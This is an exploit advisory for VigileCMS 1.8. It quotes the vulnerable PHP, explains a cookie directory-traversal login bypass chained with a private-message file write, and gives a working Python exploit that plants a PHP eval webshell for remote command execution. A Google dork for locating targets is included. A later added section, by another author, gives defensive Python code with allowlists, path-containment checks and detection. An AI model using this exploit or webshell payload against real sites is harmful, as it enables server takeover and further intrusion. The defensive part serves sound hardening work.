VigileCMS <= 1.8 Stealth Remote Command Execution Exploit



Opencosmo Security
http://www.opencosmo.com
http://www.opencosmo.com/news.php?readmore=15


VigileCMS <= 1.8 Stealth Remote Command Execution Exploit
Credits: The:Paradox
Application: VigileCMS
Version: 1.8
Impact: Remote Command Execution
Risk: [3/5]

Exploit:

#!/usr/bin/python
#-*- coding: iso-8859-15 -*-
'''
_ _ _
| |_| |_ ___ _ _ __ __ _ _ _ __ _ __| |_____ __
| _| ' \/ -_)|_|| '_ \/ _` | '_/ _` / _` / _ \ \ /
\__|_||_\___||_|| .__/\__,_|_| \__,_\__,_\___/_\_\
|_|
------------------------------------------------------------------------------------------------
This is a Public Exploit. 22/10/2007 (dd-mm-yyyy)
------------------------------------------------------------------------------------------------
§ 0day VigileCMS 1.8 Stealth and maybe lower versions - Remote Command Execution §
Vendor: http://www.vigilenapoletano.it
Severity: Highest
Author: The:Paradox
Italy r0x.

Visit inj3ct-it.org

Comments: This exploit was coded to show some people what a real vulnerability is.
------------------------------------------------------------------------------------------------
Related Codes:

--- index.php; line 64:

if (isset($_COOKIE[rem_user]) and isset ($_COOKIE[rem_pass]) and !isset($_SESSION[user])) {
    if(file_exists(USERS_TAB."/$_COOKIE[rem_user].$_COOKIE[rem_pass].php")){
        $_SESSION[user] = $_COOKIE[rem_user];
        $_SESSION[pass] = $_COOKIE[rem_pass];
        logthis("$_SESSION[user] si è collegato al Sito: riconosciuto con Cookie!");
        UserVisita ();// update the user's database record with the visit count
    }
}

--- func.inc.php; line 93:

function is_admin(){ //## FUNCTION ##
    if( (isset($_SESSION[user]) and isset($_SESSION[pass])) && (file_exists(ADMIN_TAB."/$_SESSION[user].$_SESSION[pass].php")) ){
        return true;
    } else {
        return false;
    }
}

--- func.inc.php; line 109:

function is_superadmin(){ //## FUNCTION ##
    include (LOGS_TAB."/creazione.php");
    if (isset($_SESSION["user"]) and isset($_SESSION["pass"]) and ($_SESSION[user]==$primo_amministra)) {
        return true;
    } else {
        return false;
    }
}

--- vedipm.php; line 210:

if ($_POST[ttl] =="") $_POST[ttl]="Nessun oggetto";

$_POST[ttl] =stripslashes($_POST[ttl]);
$_POST[ttl] =htmlspecialchars($_POST[ttl]); // prevents rendering of html and malicious characters such as javascript
$_POST[cont]=stripslashes($_POST[cont]);
$_POST[cont]=htmlspecialchars($_POST[cont]); // prevents rendering of html and malicious characters such as javascript
$_POST[cont]=str_replace("\r\n","[br]",$_POST[cont]);
$_POST[cont]=str_replace("<~>","<|>",$_POST[cont]);
$_POST[ttl]=str_replace("<~>","<|>",$_POST[ttl]);

$time = time();

$newpm = fopen (PM_TAB."/$_POST[to]", "a");
fwrite ($newpm, "$_POST[ttl]<~>$_POST[cont]<~>$_SESSION[user]<~>$time<~>non_letto\r\n");
fclose($newpm);
------------------------------------------------------------------------------------------------
Bug Explanation:

The platform presents some vulnerabilities in the "login system" and in the "private message sender system".
The first vulnerability is in index.php, which verifies the login without an SQL database by checking for the existence of a file with the structure Nick.HashMD5Password.php in a "db" directory.
The CMS's coder didn't think about directory traversal. In fact, if we try to log in with these cookies:

rem_user = /../users/Nick
rem_pass = HashMD5Password

where Nick and HashMD5Password are an existing username and the MD5 hash of its password, we'll gain administration rights. This happens because the is_admin() function checks for the existence of the file /db/admin/../users/Nick.HashMD5Password.php
Obviously this may work with any file (with some collateral errors, because an include is missing :P).
However, this doesn't let us do many actions in the control panel, because we will not have superadmin rights (see the is_superadmin() function).
The second vulnerability is in vedipm.php and lets us write a file on the server, but we can't get RCE from it alone, because our input is limited by htmlspecialchars, which changes the characters of PHP code (< >). However, $_SESSION[user] is not passed through htmlspecialchars.
Using the first and the second vulnerability together we can gain RCE. We will create a "file named with PHP code"; with this we'll log in and get an evil $_SESSION[user] that will be written into a PHP file.
------------------------------------------------------------------------------------------------
A lot of other vulnerabilities have been found in this platform, but their exploitability depends on MAGIC QUOTES being OFF or on other uses of the vulnerabilities I explained, so they were not published.
------------------------------------------------------------------------------------------------
Google Dork-> Powered by Cms Vigile
------------------------------------------------------------------------------------------------
Use this exploit at your own risk. You are responsible for your own deeds.
Not tested on versions < 1.6
------------------------------------------------------------------------------------------------
Use your brain, do not lame. Enjoy. =)
'''
#Python exploit starts:

import sys, httplib, urllib
print ""
if len(sys.argv)<=1:

    print "################################################"
    print " VigileCMS <= 1.8 Stealth "
    print " Remote Command Execution "
    print " "
    print " Discovered By The:Paradox "
    print " "
    print " Usage: "
    print " %s [Target] [Path] " % (sys.argv[0])
    print " "
    print " Example: "
    print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])
    print " "
    print " You may have to set other options in the "
    print " code, like port if it isn't 80 "
    print " or options for old viglecms' versions. "
    print " "
    print "################################################\n"
    sys.exit()
else:
    print "################################################"
    print " VigileCMS <= 1.8 Stealth "
    print " Remote Command Execution "
    print " "
    print " Discovered By The:Paradox "
    print " "
    print " Usage: "
    print " %s [Target] [Path] " % (sys.argv[0])
    print " "
    print " Example: "
    print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])
    print " "
    print " You may have to set other options in the "
    print " code, like port if it isn't 80 "
    print " or options for old viglecms' versions. "
    print " "
    print "################################################\n"
    print "[.]Exploit Starting. "
#Some Vars
old = 0 #set to 1 if you are trying to exploit a 1.6 vigile cms version
port = 80
db = "db" #Directory of database
target = sys.argv[1]
try:directory = sys.argv[2]
except IndexError:directory = "/"
#Starting
try:
    #Verifying /db/index.php
    conn = httplib.HTTPConnection(target,port)
    conn.request("GET", "%sdb/index.php" % (directory))
    r1 = conn.getresponse()
    print "Verifing existence of-> %s%s%s/index.php" % (target,directory,db),r1.status, r1.reason
    if r1.status == 404:
        sys.exit("[-]/db/index.php not found (404). Aborted.")
    conn.close()
    #Verifying /pm/index.php
    conn = httplib.HTTPConnection(target,port)
    conn.request("GET", "%sdb/pm/index.php" % (directory))
    r1 = conn.getresponse()
    print "Verifing existence of-> %s%s%s/pm/index.php" % (target,directory,db),r1.status, r1.reason
    if r1.status == 404:
        sys.exit("[-]/db/pm/index.php not found (404). Aborted.")

except httplib.ResponseNotReady:
    sys.exit("[-]ResponseNotReady. Aborted.")

if old == 1:
    pt = "/"
    pt2 = "?"
else:
    pt = "?"
    pt2 = "&"

conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': '../.paradox-got-this-one.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F..%2F; rem_pass=%2Findex;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #1 -->",response.status, response.reason
conn.close()

conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': '../igotyourbox.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F..%2F%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E; rem_pass=paradox-got-this-one;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
print "[.]Doing Post Connection #2 -->",response.status, response.reason
conn.close()
try:

    conn = httplib.HTTPConnection(target,port)
    path = "%s%s/igotyourbox.php" % (directory,db)
    conn.request("GET", path)
    r1 = conn.getresponse()
    conn.close()
except httplib.ResponseNotReady:
    sys.exit("[-]ResponseNotReady. Aborted.")

print "[.]Verifing Exploit Success..."
if r1.status == 404:
    sys.exit("[-]Exploit Failed.")
else:
    print "[+]Done.\n[+]Removing the page..."
    conn = httplib.HTTPConnection(target,port)
    path = directory + "db/igotyourbox.php?dox=unlink('%3C?php%20eval(stripslashes($_GET[dox]));%20?%3E.paradox-got-this-one.php');"
    conn.request("GET", path)
    print "[+]Success :D Exploited.\n\n A PHP Page Has Been Created -> %s%s%s/igotyourbox.php \n With Content:\n \n Execute your php codes :P Have Fun :D\n\n-= Paradox Got This One :D =-\n" % (target,directory,db)

Solution: No solution available. Write to the administrator to add this information.
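The advisory lists no fix, so the following is an added defensive example: my own code, not VigileCMS's or The:Paradox's, written in Python 3 rather than the project's PHP. It shows the two controls that close both bugs described above at once: an allowlist for the nick and MD5 identifiers before they ever become part of a file name (which rejects both the "/../" prefix and the "<?php" session name), and a containment check that the resolved path stays inside the intended directory (which is what is_admin() lacked when it accepted /db/admin/../users/...). The db/ layout, the file contents, the request_findings helper and all sample values are constructed assumptions for the demonstration.

```python
import hashlib
import os
import re
import tempfile

# Allowlists (assumed) for the two identifiers VigileCMS builds file names
# from: a user nick and an MD5 hex digest. Anything else is rejected before
# any file system call, so "/../users/Nick" and "<?php ... ?>" never reach
# file_exists() or fopen().
NICK_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")
MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def valid_nick(nick):
    return bool(NICK_RE.match(nick or ""))


def valid_md5(digest):
    return bool(MD5_RE.match(digest or ""))


def contained_path(base_dir, *parts):
    """Join parts under base_dir and return the resolved path only if it is
    still strictly inside base_dir; any traversal yields None."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, *parts))
    if not candidate.startswith(base + os.sep):
        return None
    return candidate


def cookie_login_ok(users_dir, nick, pass_hash):
    """Hardened stand-in for the index.php cookie check: both identifiers
    must pass the allowlist AND the record must resolve under users_dir."""
    if not (valid_nick(nick) and valid_md5(pass_hash)):
        return False
    path = contained_path(users_dir, "%s.%s.php" % (nick, pass_hash))
    return path is not None and os.path.isfile(path)


def is_admin_ok(admin_dir, nick, pass_hash):
    """Hardened stand-in for is_admin(): same checks against the admin dir,
    so a regular user's record can no longer be reached via '../users'."""
    return cookie_login_ok(admin_dir, nick, pass_hash)


def pm_recipient_ok(pm_dir, recipient):
    """Hardened stand-in for vedipm.php's fopen(PM_TAB."/$_POST[to]")."""
    return valid_nick(recipient) and contained_path(pm_dir, recipient) is not None


def request_findings(cookies, post):
    """Detection view (assumed helper): list why a request would be refused,
    suitable for turning rejected cookie logins or PM sends into log events."""
    findings = []
    if "rem_user" in cookies and not valid_nick(cookies["rem_user"]):
        findings.append("rem_user fails allowlist")
    if "rem_pass" in cookies and not valid_md5(cookies["rem_pass"]):
        findings.append("rem_pass fails allowlist")
    if "to" in post and not valid_nick(post["to"]):
        findings.append("pm recipient fails allowlist")
    if any("<?" in v for v in list(cookies.values()) + list(post.values())):
        findings.append("php open tag in user input")
    return findings


def demo():
    """Build a constructed db/ layout in a temp dir and exercise the checks
    with the identifier shapes the advisory describes."""
    root = tempfile.mkdtemp()
    users = os.path.join(root, "db", "users")
    admin = os.path.join(root, "db", "admin")
    pm = os.path.join(root, "db", "pm")
    for d in (users, admin, pm):
        os.makedirs(d)
    digest = hashlib.md5(b"constructed-password").hexdigest()  # constructed
    with open(os.path.join(users, "alice.%s.php" % digest), "w") as fh:
        fh.write("<?php /* constructed user record */ ?>")
    return {
        "legit_login": cookie_login_ok(users, "alice", digest),
        "legit_is_admin": is_admin_ok(admin, "alice", digest),
        "traversal_login": cookie_login_ok(admin, "/../users/alice", digest),
        "traversal_raw_path": contained_path(admin, "../users/alice.%s.php" % digest),
        "pm_traversal": pm_recipient_ok(pm, "../igotyourbox.php"),
        "pm_legit": pm_recipient_ok(pm, "alice"),
        "findings": request_findings(
            {"rem_user": "/../<?php echo 1; ?>", "rem_pass": "/index"},
            {"to": "../igotyourbox.php", "cont": "1"},
        ),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-20s %r" % (key, value))
```

The allowlist alone would have stopped every payload on this page; the containment check is kept as a second layer because realpath()-based containment still holds when a later code path builds a name from something other than these two identifiers. Note that is_admin_ok() reports False for alice even though her login is valid, which is exactly the distinction the original is_admin() lost.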
